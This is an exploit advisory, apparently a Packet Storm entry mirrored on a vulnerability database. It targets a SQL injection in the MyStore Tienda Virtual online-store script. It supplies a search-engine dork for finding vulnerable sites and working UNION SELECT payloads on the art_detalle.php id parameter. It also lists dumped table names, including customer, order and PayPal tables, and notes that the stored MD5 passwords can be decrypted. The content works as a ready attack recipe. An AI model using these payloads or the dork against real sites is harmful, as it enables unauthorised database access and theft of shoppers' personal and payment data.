MyStore Tienda Virtual SQL Injection

🗓️ 03 Jan 2012 00:00:00Reported by Arturo ZamoraType

packetstorm🔗 packetstormsecurity.com👁 25 Views

MyStore Tienda Virtual SQL Injection by Arturo Zamora, high risk, SQL injection through art_detalle.php?id parameter, database information exposed, insecure password decryption

`========================================================================================  
| # Title : SQL Injection MyStore Tienda Virtual |  
| # Author : Arturo Zamora |  
| # email : [email protected] |  
| # DAte : 02/01/2012 |  
| # Verified : yes |  
| # Risk : High |  
| # Published: |  
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |  
| # Dork : inurl:art_detalle.php?id= |  
====================== zeux0r 2012 =================================  
Exploit :  
======================  
  
http://localhost/path/art_detalle.php?id={sqli}  
  
======================  
Example:  
======================  
  
http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--  
  
http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--  
  
======================  
dbs:  
======================  
articulos   
articulos_nivel3   
articulos_relacionados   
articulos_secciones   
atajada   
atajadausa   
ayuda   
ayudausa   
banners   
banners_conteo   
banners_lateral   
banners_lateralusa   
basket   
campania   
clientesclientes_envio   
clientes_facturacion   
colores   
comentario   
comisionistas   
comisionistas_hits   
comisionistas_modulos   
contacto   
descuentos   
descuentos_cruzados   
descuentos_temp   
especificacion   
home   
homeusa   
justin   
justinusa   
mensajeria   
mensajeriausa   
mixer   
newsletter   
newsletter_mensaje   
nivel1   
nivel2   
nivel3   
parametros   
paypal  
pedidos   
pedidos_detalle   
pedidos_detalleusa   
pedidosusa   
remate   
remateusa   
secciones   
shopper  
sol_info   
talisman   
tallas   
ticker   
tickerusa   
visitas  
  
======================  
Information :  
======================  
  
password decrypt md5  
  
======================  
  
I Love U Pumosita  
  
www.insecure.org.mx  
  
================================ Mexican shotos ========================================  
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *  
-------------------------------------------------------------------------------------------  
  
`

03 Jan 2012 00:00Current

0.6Low risk

Vulners AI Score0.6